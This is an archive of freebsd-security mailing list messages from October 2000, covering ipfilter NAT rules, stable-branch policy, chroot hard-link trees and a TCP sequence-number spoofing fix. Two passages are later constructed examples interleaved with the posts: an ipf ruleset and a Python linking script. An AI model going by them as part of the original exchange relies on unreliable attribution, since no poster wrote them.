Received: from allmaui.com (server25.aitcom.net [208.234.0.10]) by hub.freebsd.org (Postfix) with ESMTP id 3B34937B66C for ; Thu, 5 Oct 2000 21:07:28 -0700 (PDT)
Received: from allmaui.com (c756043-a.stcla1.sfba.home.com [24.20.23.203]) by allmaui.com (8.8.8/8.8.5) with ESMTP id AAA02479 for ; Fri, 6 Oct 2000 00:07:27 -0400
Message-ID: <39DCED87.C7B7FA0B@allmaui.com>
Date: Thu, 05 Oct 2000 21:07:20 +0000
From: Craig Cowen
X-Mailer: Mozilla 4.74 [en] (X11; U; Linux 2.2.12 i386)
X-Accept-Language: en
MIME-Version: 1.0
To: "freebsd-security@FreeBSD.ORG"
Subject: IPFILTER Question
Content-Type: multipart/alternative; boundary="------------79612B08DA6CBB83953CBFBD"
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

I have set up ipf with options IPFILTER_DEFAULT_BLOCK in my kernel.
When using ipnat, I have 'pass in on (private interface) from 192.168.0.0/24 to any keep state' in my rules.

I have no rules specified for the public interface.
The boxen behind the firewall can surf.

Is this right, and why?

Seems to me I have to allow out on the public interface with keep state for it all to work.

-- 
Craig Cowen
408-394-6673 Cell
craig-pager@allmaui.com
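Nobody in the thread answers Craig's question, and what follows does not try to explain why his one-rule setup works. It is an added example, not a ruleset from the thread or from any of its posters: the explicit form he suspected he needed, a default-block ipfilter ruleset with pass rules on both interfaces, written so that it does not depend on a state entry created on the inside interface being honoured when the translated packet leaves the outside one. The file path and the interface names (fxp0 public, fxp1 private) are assumptions.

```conf
# /etc/ipf.rules  (constructed example; path and interface names are assumed)
# fxp0 = public interface, fxp1 = private interface carrying 192.168.0.0/24.
# The kernel is built with IPFILTER_DEFAULT_BLOCK, so an unmatched packet is
# dropped anyway; the two catch-all block rules exist so those drops get logged.
# A rule with "quick" is final when it matches; without "quick" ipf keeps
# scanning and the last matching rule wins, which is why the catch-alls go first.

block in  log all
block out log all

# The loopback interface is unrestricted.
pass in  quick on lo0 all
pass out quick on lo0 all

# Anti-spoofing: these source ranges can never legitimately arrive on the
# public side (192.168.0.0/16 also covers our own inside subnet).
block in log quick on fxp0 from 192.168.0.0/16 to any
block in log quick on fxp0 from 10.0.0.0/8     to any
block in log quick on fxp0 from 172.16.0.0/12  to any
block in log quick on fxp0 from 127.0.0.0/8    to any

# Inside hosts may open connections. "flags S" limits the TCP rule to
# connection-setup packets; the state entry then admits the rest of the exchange.
pass in quick on fxp1 proto tcp  from 192.168.0.0/24 to any flags S keep state
pass in quick on fxp1 proto udp  from 192.168.0.0/24 to any keep state
pass in quick on fxp1 proto icmp from 192.168.0.0/24 to any keep state

# The same traffic leaving the public interface is passed explicitly, so the
# ruleset does not rely on the state made on fxp1 being consulted for the
# packet as it exits fxp0. The source is "any" because by this point ipnat
# may already have rewritten it to the public address.
pass out quick on fxp0 proto tcp  from any to any flags S keep state
pass out quick on fxp0 proto udp  from any to any keep state
pass out quick on fxp0 proto icmp from any to any keep state

# Nothing is passed in on fxp0 by rule: replies reach the inside only through
# the state entries above, and everything else is logged and dropped.
```

Load it with "ipf -Fa -f /etc/ipf.rules" after the NAT rules ("ipnat -CF -f /etc/ipnat.rules"), then compare what the kernel actually holds against the file with "ipfstat -io"; that comparison is the check worth running after every reload, since a parse error in the file leaves the previous rules in place. An rc.conf firewall_script written for ipfilter would run those same commands.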
From owner-freebsd-security Thu Oct 5 21:48:19 2000
Delivered-To: freebsd-security@freebsd.org
Received: from ego.mind.net (ego.mind.net [206.99.66.9]) by hub.freebsd.org (Postfix) with ESMTP id 04C7E37B502; Thu, 5 Oct 2000 21:48:05 -0700 (PDT)
Received: from takhus-home.ashlandfn.org (AFN-Dyn-6315110844.pc.ashlandfiber.net [63.151.108.44]) by ego.mind.net (8.9.3/8.9.3) with ESMTP id VAA17135; Thu, 5 Oct 2000 21:48:00 -0700
Received: from localhost (fleisher@localhost) by takhus-home.ashlandfn.org (8.11.0/8.11.0) with ESMTP id e964lkF13361; Thu, 5 Oct 2000 21:47:46 -0700 (PDT) (envelope-from takhus@takhus.mind.net)
X-Authentication-Warning: takhus-home.ashlandfn.org: fleisher owned process doing -bs
Date: Thu, 5 Oct 2000 21:47:46 -0700 (PDT)
From: Tony Fleisher
X-Sender: fleisher@takhus-home.ashlandfn.org
To: Brett Glass
Cc: cvs-committers@FreeBSD.ORG, cvs-all@FreeBSD.ORG, freebsd-security@FreeBSD.ORG, Ralph Huntington
Subject: Re: Stable branch
In-Reply-To: <4.3.2.7.2.20001005105420.04a7b540@localhost>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

On Thu, 5 Oct 2000, Brett Glass wrote:

> At 04:06 AM 10/5/2000, Ralph Huntington wrote:
>
> >Stable branch is very important for production use and should incorporate
> >bug fixes and security patches, but not feature enhancements. The extent
> >of support and maintenance for stable should be one major release prior to
> >the latest release (not current), i.e., since 4.x-RELEASE is the latest,
> >then 3.x-STABLE should be supported with bug fixes and security patches
> >until a 5.x-RELEASE is out.
> >
> >Does this seem unreasonable? -=r=-
>
> Perhaps this should be formalized as three branches:
>
> Branch name:            Bug/security    New features?       "Breakable" for
>                         fixes?                              a day or more?
>
> -PRODUCTION             YES             NO                  NO
>
> -STABLE                 YES             YES, PREFERABLY     NO
>                                         AFTER TESTING
>                                         IN -CURRENT
>
> -DEVELOPMENT            YES             YES                 YES
> (formerly -CURRENT)
>
> What do you think of this as a model for what people seem to be
> asking for?
>
> --Brett

I have been watching this thread, and I was just about to write in suggesting nearly this exact same model when I saw your post.

It certainly seems that there are two very distinct groups of people tracking -stable: those wanting new features, new hardware, etc., and those wanting simply updates for security patches and bug fixes. It seems that there are enough people in both groups that are not willing to deal with all the risks that -current brings with it that dividing -stable into two tracks seems to be the only solution to meet the needs/desires of these two groups.
I also agree that support and, at least security related, maintenance should continue for one major release back, as suggested by Ralph previously. It seems that this is not too much to ask (in fact it seems to be happening already, based on the MFCs to RELENG_3), and making that the "official" position may help FreeBSD gain more support in the corporate environments where an upgrade every six months is really not feasible.

Just my thoughts,
Tony.

From owner-freebsd-security Thu Oct 5 23:46:56 2000
Delivered-To: freebsd-security@freebsd.org
Received: from iclub.nsu.ru (iclub.nsu.ru [193.124.222.66]) by hub.freebsd.org (Postfix) with ESMTP id 74EE437B66C; Thu, 5 Oct 2000 23:46:26 -0700 (PDT)
Received: from localhost (fjoe@localhost) by iclub.nsu.ru (8.9.3/8.9.3) with ESMTP id NAA80996; Fri, 6 Oct 2000 13:43:42 +0700 (NSS) (envelope-from fjoe@iclub.nsu.ru)
Date: Fri, 6 Oct 2000 13:43:42 +0700 (NSS)
From: Max Khon
To: Neil Blakey-Milner
Cc: Brett Glass, Warner Losh, developers@FreeBSD.org, security@FreeBSD.org
Subject: Re: Stable branch
In-Reply-To: <20001006014106.A97336@mithrandr.moria.org>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-freebsd-security@FreeBSD.ORG
Precedence: bulk
X-Loop: FreeBSD.org

hi, there!

On Fri, 6 Oct 2000, Neil Blakey-Milner wrote:

> > >Otherwise would do a PR spin with the following patch to 3.x would do
> > >the trick (I'd call it -solid, because -stable is suitable for
> > >production machines).
> >
> > Personally, I would equate "-SOLID" with "suitable for production
> > machines" whereas -STABLE would be "OK for application developers
> > and eager/early adopters but still settling down to the confidence
> > level of -SOLID."
> >
> > Which might imply setting things up so that the -STABLE branch
> > becomes -SOLID after, say, a good .2 release.
>
> Then people will say, "Oh no, it's the first -SOLID release, we should
> only start using it after two -SOLID releases".

I think ERRATA for releases should be maintained more actively (they should contain all bug fixes) so that -SOLID will be -RELEASE + patches applied from ERRATA

/fjoe

From owner-freebsd-security Fri Oct 6 1: 7: 8 2000
Delivered-To: freebsd-security@freebsd.org
Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id ACF8D37B502 for ; Fri, 6 Oct 2000 01:07:05 -0700 (PDT)
Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id KAA09584; Fri, 6 Oct 2000 10:06:56 +0200 (CEST) (envelope-from des@ofug.org)
X-URL: http://www.ofug.org/~des/
X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated.
To: Roman Shterenzon Cc: Craig Cowen , freebsd-security@FreeBSD.ORG Subject: Re: Default Deny References: From: Dag-Erling Smorgrav Date: 06 Oct 2000 10:06:56 +0200 In-Reply-To: Roman Shterenzon's message of "Fri, 6 Oct 2000 02:40:08 +0200 (IST)" Message-ID: Lines: 16 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Roman Shterenzon writes:
> The ipfilter in freebsd seems cursed or abandoned.
> Example: this option is not documented.
> Another example: there're no hooks to start ipfilter from /etc/rc*
> even though there's PR: 20202

Put this in your rc.conf:

    firewall_enable="YES"
    firewall_script="/etc/firewall"

Where /etc/firewall is a shell script that sets up your firewall.

DES
--
Dag-Erling Smorgrav - des@ofug.org

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Oct 6 1:55:16 2000 Delivered-To: freebsd-security@freebsd.org Received: from jamus.xpert.com (jamus.xpert.com [199.203.132.17]) by hub.freebsd.org (Postfix) with ESMTP id ED1B937B502 for ; Fri, 6 Oct 2000 01:54:45 -0700 (PDT) Received: from roman (helo=localhost) by jamus.xpert.com with local-esmtp (Exim 3.12 #5) id 13hTHE-000794-00; Fri, 06 Oct 2000 10:54:48 +0200 Date: Fri, 6 Oct 2000 10:54:48 +0200 (IST)
From: Roman Shterenzon To: Dag-Erling Smorgrav Cc: freebsd-security@FreeBSD.ORG Subject: Re: Default Deny In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
On 6 Oct 2000, Dag-Erling Smorgrav wrote:
> Roman Shterenzon writes:
> > The ipfilter in freebsd seems cursed or abandoned.
> > Example: this option is not documented.
> > Another example: there're no hooks to start ipfilter from /etc/rc*
> > even though there's PR: 20202
>
> Put this in your rc.conf:
>
> firewall_enable="YES"
> firewall_script="/etc/firewall"
>
> Where /etc/firewall is a shell script that sets up your firewall.

Excerpt from /etc/rc.network:

    case ${firewall_enable} in
    [Yy][Ee][Ss])
        if [ "${firewall_in_kernel}" -eq 0 ] && kldload ipfw; then
            firewall_in_kernel=1
            echo "Kernel firewall module loaded."
        elif [ "${firewall_in_kernel}" -eq 0 ]; then
            echo "Warning: firewall kernel module failed to load."
        fi
        ;;
    esac

..

So obviously this hook is not really right.

--
Roman Shterenzon, UNIX System Administrator and Consultant
[ Xpert UNIX Systems Ltd., Herzlia, Israel. Tel: +972-9-9522361 ]

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Oct 6 2:15:45 2000 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CA7C537B502 for ; Fri, 6 Oct 2000 02:15:43 -0700 (PDT) Received: from citusc17.usc.edu (citusc17.usc.edu [128.125.38.177]) by mx1.FreeBSD.org (Postfix) with ESMTP id 83F436E3467 for ; Fri, 6 Oct 2000 02:15:43 -0700 (PDT) Received: (from kris@localhost) by citusc17.usc.edu (8.9.3/8.9.3) id CAA91888; Fri, 6 Oct 2000 02:08:22 -0700 (PDT) Date: Fri, 6 Oct 2000 02:08:21 -0700
From: Kris Kennaway To: Bart_van_Leeuwen@doosys.com Cc: "Jacques A. Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL Message-ID: <20001006020820.A91130@citusc17.usc.edu> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from Bart_van_Leeuwen@doosys.com on Thu, Oct 05, 2000 at 02:25:11PM +0200 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, Oct 05, 2000 at 02:25:11PM +0200, Bart_van_Leeuwen@doosys.com wrote: > Creating a single jail for a group of interactive users is quite practical. > Creating a separate jail for each individual interactive user can become > impractical for example due to disk space requirements and the > complexity of the environment for the administrator. Read-only nullfs mounts might be good enough for a relatively few number of users (they're working in -current nowadays). It would be interesting to try and do this in practice and see if it's usable, and if not, why not. Kris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 4:17:12 2000 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 1B1BD37B66D for ; Fri, 6 Oct 2000 04:17:03 -0700 (PDT) Received: (from des@localhost) by flood.ping.uio.no (8.9.3/8.9.3) id NAA10286; Fri, 6 Oct 2000 13:15:42 +0200 (CEST) (envelope-from des@ofug.org) X-URL: http://www.ofug.org/~des/ X-Disclaimer: The views expressed in this message do not necessarily coincide with those of any organisation or company with which I am or have been affiliated. To: Kris Kennaway Cc: Bart_van_Leeuwen@doosys.com, "Jacques A.
Vidrine" , freebsd-security@FreeBSD.ORG Subject: Re: Fwd: eth-security : ANNOUNCE : Resources no for ALL References: <20001006020820.A91130@citusc17.usc.edu> 
From: Dag-Erling Smorgrav Date: 06 Oct 2000 13:15:42 +0200 In-Reply-To: Kris Kennaway's message of "Fri, 6 Oct 2000 02:08:21 -0700" Message-ID: Lines: 21 User-Agent: Gnus/5.0802 (Gnus v5.8.2) Emacs/20.4 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kris Kennaway writes: > Read-only nullfs mounts might be good enough for a relatively few > number of users (they're working in -current nowadays). It would be > interesting to try and do this in practice and see if it's usable, and > if not, why not. At my previous place of employment, I implemented a system for running separate virtual hosts' CGI scripts in separate chroot trees (no jail, this was on 3.x and only moved to 4.x a week or two before I quit). I had a tree template that included a minimal set of binaries, libraries and configuration files (resolv.conf, passwd, group etc.). The setup script (written in Perl) would create hard links between the template and the user's tree, so very little additional disk space was needed for each user. If you needed to change something in the template, you could run the setup script again and it would compare inode numbers and relink files that had changed. Naturally, none of the shared files were writable by any of the users. DES -- Dag-Erling Smorgrav - des@ofug.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 5: 5:42 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id E0F1D37B502 for ; Fri, 6 Oct 2000 05:05:38 -0700 (PDT) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id JAA80734; Fri, 6 Oct 2000 09:07:17 -0300 (ART) 
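The hard-link template scheme Dag-Erling Smorgrav describes in the message above, as an added example that is not his Perl setup script and not part of the original thread: a Python reimplementation (Python rather than Perl so it runs as-is on any current host) that links every regular file of a template into a user's tree and, on a re-run, compares (st_dev, st_ino) and relinks only files whose template inode has changed. It also enforces the condition his message states, that none of the shared files may be writable by the users: a template file that is group- or world-writable is refused, because a hard link shares the inode and such a link would let one user rewrite the template for everyone. All paths and file contents below are constructed for the demonstration.

```python
"""Per-user chroot trees as hard links into a shared, read-only template.

Added example, not Dag-Erling Smorgrav's Perl setup script: it reimplements
the scheme described on the list (link every template file into the user's
tree; on re-run compare inode numbers and relink files that were replaced).
Paths and file contents are constructed for the demonstration.
"""
import os
import shutil
import stat
import tempfile

# Mode bits that would let a non-owner write through the shared inode.
WRITABLE_BY_OTHERS = stat.S_IWGRP | stat.S_IWOTH


def sync_tree(template, user_tree):
    """Mirror `template` into `user_tree`, hard-linking every regular file.

    First run: every file is linked.  Later runs: a file is relinked only when
    the template's inode changed, i.e. the file was *replaced* (install/rename),
    not edited in place.  Returns the sorted list of relative paths relinked.
    """
    relinked = []
    for dirpath, _dirs, filenames in os.walk(template):
        rel = os.path.relpath(dirpath, template)
        dest_dir = os.path.normpath(os.path.join(user_tree, rel))
        os.makedirs(dest_dir, exist_ok=True)  # directories are real, not links
        for name in filenames:
            src = os.path.join(dirpath, name)
            dst = os.path.join(dest_dir, name)
            src_st = os.lstat(src)
            if not stat.S_ISREG(src_st.st_mode):
                continue  # symlinks, devices etc. are outside this scheme
            if src_st.st_mode & WRITABLE_BY_OTHERS:
                # A hard link shares the inode: a user who can write the link
                # rewrites the template for every other user.  Refuse.
                raise PermissionError(f"template file writable by others: {src}")
            try:
                dst_st = os.lstat(dst)
            except FileNotFoundError:
                dst_st = None
            if dst_st is not None:
                if (dst_st.st_dev, dst_st.st_ino) == (src_st.st_dev, src_st.st_ino):
                    continue  # already the same inode, nothing to do
                os.unlink(dst)  # stale link to a replaced template file
            os.link(src, dst)
            relinked.append(os.path.normpath(os.path.join(rel, name)))
    return sorted(relinked)


def write_file(path, content, mode=0o644):
    """Create `path` (and its parent directories) with an explicit mode."""
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as fh:
        fh.write(content)
    os.chmod(path, mode)


def demo():
    """Build a template, link a user tree, replace one template file, resync.

    Returns (first_run, second_run, after_replace, shares_inode, refused)
    so the behaviour can be checked without a real chroot or jail.
    """
    base = tempfile.mkdtemp()
    try:
        template = os.path.join(base, "template")
        alice = os.path.join(base, "users", "alice")
        write_file(os.path.join(template, "bin", "sh"), "#!/bin/sh\n", 0o755)
        write_file(os.path.join(template, "etc", "resolv.conf"),
                   "nameserver 192.0.2.1\n")  # constructed content

        first = sync_tree(template, alice)   # links both files
        second = sync_tree(template, alice)  # nothing changed, nothing relinked

        # Replace bin/sh the way an install does: write a new file and rename
        # it over the old one.  The user's link still points at the old inode.
        new_sh = os.path.join(template, "bin", "sh.new")
        write_file(new_sh, "#!/bin/sh\n# updated\n", 0o755)
        os.replace(new_sh, os.path.join(template, "bin", "sh"))
        third = sync_tree(template, alice)   # relinks bin/sh only

        shares_inode = (os.lstat(os.path.join(template, "bin", "sh")).st_ino
                        == os.lstat(os.path.join(alice, "bin", "sh")).st_ino)

        # A group-writable template file must be refused, not linked.
        write_file(os.path.join(template, "etc", "motd"), "hi\n", 0o664)
        try:
            sync_tree(template, alice)
            refused = False
        except PermissionError:
            refused = True
        return first, second, third, shares_inode, refused
    finally:
        shutil.rmtree(base)


if __name__ == "__main__":
    print(demo())
```

Two conditions the scheme depends on are worth stating when it is used: template updates must replace files (write a new file and rename it over the old one, as an install does) rather than edit them in place, otherwise the change propagates silently through every user's link and the inode comparison never fires; and each user tree must sit on the same filesystem as the template, since hard links cannot cross filesystems.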
From: Fernando Schapachnik Message-Id: <200010061207.JAA80734@ns1.via-net-works.net.ar> Subject: Re: IPFILTER Question In-Reply-To: <39DCED87.C7B7FA0B@allmaui.com> "from Craig Cowen at Oct 5, 2000 09:07:20 pm" To: Craig Cowen Date: Fri, 6 Oct 2000 09:07:17 -0300 (ART) Cc: "freebsd-security@FreeBSD.ORG" Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Why don't you put a deny log rule for the outside iface and see what happens? Good luck! En un mensaje anterior, Craig Cowen escribió: > > I have setup ipf with options IPFILTER_DEFAULT_BLOCK in my kernel. > When using ipnat, I have 'pass in on (private interface) from > 192.168.0.0/24 to any keep state' in my rules. > > I have no rules specified for the public interface. > The boxen behind the firewall can surf. Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 5:10:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.via-net-works.net.ar (ns1.via-net-works.net.ar [200.10.100.10]) by hub.freebsd.org (Postfix) with ESMTP id DB9E737B66C for ; Fri, 6 Oct 2000 05:10:49 -0700 (PDT) Received: (from fpscha@localhost) by ns1.via-net-works.net.ar (8.9.3/8.9.3) id JAA83234 for security@freebsd.org; Fri, 6 Oct 2000 09:12:54 -0300 (ART) 
From: Fernando Schapachnik Message-Id: <200010061212.JAA83234@ns1.via-net-works.net.ar> Subject: HERT advisory: FreeBSD IP Spoofing (fwd) To: security@freebsd.org Date: Fri, 6 Oct 2000 09:12:54 -0300 (ART) Reply-To: Fernando Schapachnik X-Mailer: ELM [version 2.4ME+ PL82 (25)] MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Content-Type: text/plain; charset=ISO-8859-1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Many of you may have read this. It states that 4.1 is vulnerable, but doesn't mention 4.1.1. It also provides URLs to patches that are not accessible. Somebody has more info? TIA! ----- Forwarded message from Pascal Bouchareine ----- From owner-bugtraq@SECURITYFOCUS.COM Thu Oct 5 20:40:56 2000 Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Delivered-To: bugtraq@securityfocus.com Content-Disposition: inline User-Agent: Mutt/1.2.5i Message-ID: <20001005205149.A24599@plan9.hert.org> Date: Thu, 5 Oct 2000 20:51:49 +0200 Reply-To: Pascal Bouchareine Sender: Bugtraq List
From: Pascal Bouchareine Subject: HERT advisory: FreeBSD IP Spoofing To: BUGTRAQ@SECURITYFOCUS.COM Content-Length: 176 Hi, This has just been fixed in FreeBSD current, release, and stable. -- pub 1024D/98F6C473 2000-08-14 Pascal Bouchareine (kalou) [ Attachment, skipping... ] ----- End of forwarded message from Pascal Bouchareine ----- Fernando P. Schapachnik Administración de la red VIA NET.WORKS ARGENTINA S.A. fernando@via-net-works.net.ar (54-11) 4323-3333 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 5:17:41 2000 Delivered-To: freebsd-security@freebsd.org Received: from surreal.nl (surreal.nl [212.204.236.10]) by hub.freebsd.org (Postfix) with ESMTP id 9681E37B502 for ; Fri, 6 Oct 2000 05:17:38 -0700 (PDT) Received: by surreal.nl (Postfix, from userid 1000) id D06A31DA8A; Tue, 3 Oct 2000 03:40:54 +0200 (CEST) Received: from localhost (localhost [127.0.0.1]) by surreal.nl (Postfix) with ESMTP id CD6BE1DA89; Tue, 3 Oct 2000 03:40:54 +0200 (CEST) Date: Tue, 3 Oct 2000 03:40:54 +0200 (CEST) 
From: Walter Hop To: Michael Bryan Cc: security@FreeBSD.ORG Subject: Re: cvs commit: src/etc inetd.conf In-Reply-To: <39D93044.8B0C4E69@ursine.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org [in reply to Michael Bryan , 02/10/00] > If any port has a listener on it, as an admin you'd better know what that > listener is This shell script should be in the base ;) lsof -i | grep LISTEN | awk '{ print $1 "("$3") " $9} ' | sort | uniq Don't recall where I got it from, some Linux site I believe... -- "You might feel like you're melting and want to roll around on the ground, or maybe thats just me." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Oct 6 5:29:49 2000 Delivered-To: freebsd-security@freebsd.org Received: from whale.sunbay.crimea.ua (whale.sunbay.crimea.ua [212.110.138.65]) by hub.freebsd.org (Postfix) with ESMTP id 9A15837B66C for ; Fri, 6 Oct 2000 05:29:39 -0700 (PDT) Received: (from ru@localhost) by whale.sunbay.crimea.ua (8.11.0/8.11.0) id e96CT6R92393; Fri, 6 Oct 2000 15:29:06 +0300 (EEST) (envelope-from ru) Date: Fri, 6 Oct 2000 15:29:06 +0300 
From: Ruslan Ermilov To: Fernando Schapachnik Cc: security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) Message-ID: <20001006152906.A90221@sunbay.com> Mail-Followup-To: Fernando Schapachnik , security@FreeBSD.ORG References: <200010061212.JAA83234@ns1.via-net-works.net.ar> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <200010061212.JAA83234@ns1.via-net-works.net.ar>; from fpscha@ns1.via-net-works.net.ar on Fri, Oct 06, 2000 at 09:12:54AM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
On Fri, Oct 06, 2000 at 09:12:54AM -0300, Fernando Schapachnik wrote:
> Many of you may have read this.
>
> It states that 4.1 is vulnerable, but doesn't mention 4.1.1. It also
> provides URLs to patches that are not accessible. Somebody has more
> info?
>

kris        2000/09/28 18:37:19 PDT

  Modified files:
    sys/netinet          tcp_seq.h tcp_subr.c
  Log:
  Use stronger random number generation for TCP_ISSINCR and tcp_iss.

  Reviewed by:  peter, jlemon

  Revision  Changes    Path
  1.12      +2 -2      src/sys/netinet/tcp_seq.h
  1.81      +2 -2      src/sys/netinet/tcp_subr.c


kris        2000/09/29 01:48:45 PDT

  Modified files:        (Branch: RELENG_4)
    sys/netinet          tcp_seq.h tcp_subr.c
  Log:
  MFC: Use stronger randomness for TCP_ISSINCR and tcp_iss

  Revision  Changes    Path
  1.11.2.1  +2 -2      src/sys/netinet/tcp_seq.h
  1.73.2.5  +2 -2      src/sys/netinet/tcp_subr.c


kris        2000/09/29 01:49:56 PDT

  Modified files:        (Branch: RELENG_3)
    sys/netinet          tcp_seq.h tcp_subr.c
  Log:
  MFC: Use stronger randomness for TCP_ISSINCR and tcp_iss

  Revision  Changes    Path
  1.8.4.2   +2 -2      src/sys/netinet/tcp_seq.h
  1.49.2.6  +2 -2      src/sys/netinet/tcp_subr.c

--
Ruslan Ermilov          Oracle Developer/DBA,
ru@sunbay.com           Sunbay Software AG,
ru@FreeBSD.org          FreeBSD committer,
+380.652.512.251        Simferopol, Ukraine

http://www.FreeBSD.org  The Power To Serve
http://www.oracle.com   Enabling The Information Age

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
From owner-freebsd-security Fri Oct 6 5:37:58 2000 Delivered-To: freebsd-security@freebsd.org Received: from xkis.kis.ru (xkis.kis.ru [195.98.32.200]) by hub.freebsd.org (Postfix) with ESMTP id 5F12737B502 for ; Fri, 6 Oct 2000 05:37:50 -0700 (PDT) Received: from localhost (dv@localhost) by xkis.kis.ru (8.9.3/8.9.3) with SMTP id QAA10036; Fri, 6 Oct 2000 16:37:37 +0400 (MSD) Date: Fri, 6 Oct 2000 16:37:37 +0400 (MSD) From: Dmitry Valdov X-Sender: dv@xkis.kis.ru To: Ruslan Ermilov Cc: Fernando Schapachnik , security@FreeBSD.ORG Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) In-Reply-To: <20001006152906.A90221@sunbay.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org
Hi!

And how about 2.x branch?

Dmitry.

On Fri, 6 Oct 2000, Ruslan Ermilov wrote:
> Date: Fri, 6 Oct 2000 15:29:06 +0300
> From: Ruslan Ermilov > To: Fernando Schapachnik > Cc: security@FreeBSD.ORG > Subject: Re: HERT advisory: FreeBSD IP Spoofing (fwd) > > On Fri, Oct 06, 2000 at 09:12:54AM -0300, Fernando Schapachnik wrote: > > Many of you may have read this. > > > > It states that 4.1 is vulnerable, but doesn't mention 4.1.1. It also > > provides URL to patches that are not accesible. Somebody has more > > info? > > > kris 2000/09/28 18:37:19 PDT > > Modified files: > sys/netinet tcp_seq.h tcp_subr.c > Log: > Use stronger random number generation for TCP_ISSINCR and tcp_iss. > > Reviewed by: peter, jlemon > > Revision Changes Path > 1.12 +2 -2 src/sys/netinet/tcp_seq.h > 1.81 +2 -2 src/sys/netinet/tcp_subr.c > > > kris 2000/09/29 01:48:45 PDT > > Modified files: (Branch: RELENG_4) > sys/netinet tcp_seq.h tcp_subr.c > Log: > MFC: Use stronger randomness for TCP_ISSINCR and tcp_iss > > Revision Changes Path > 1.11.2.1 +2 -2 src/sys/netinet/tcp_seq.h > 1.73.2.5 +2 -2 src/sys/netinet/tcp_subr.c > > > kris 2000/09/29 01:49:56 PDT > > Modified files: (Branch: RELENG_3) > sys/netinet tcp_seq.h tcp_subr.c > Log: > MFC: Use stronger randomness for TCP_ISSINCR and tcp_iss > > Revision Changes Path > 1.8.4.2 +2 -2 src/sys/netinet/tcp_seq.h > 1.49.2.6 +2 -2 src/sys/netinet/tcp_subr.c > > -- > Ruslan Ermilov Oracle Developer/DBA, > ru@sunbay.com Sunbay Software AG, > ru@FreeBSD.org FreeBSD committer, > +380.652.512.251 Simferopol, Ukraine > > http://www.FreeBSD.org The Power To Serve > http://www.oracle.com Enabling The Information Age > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body 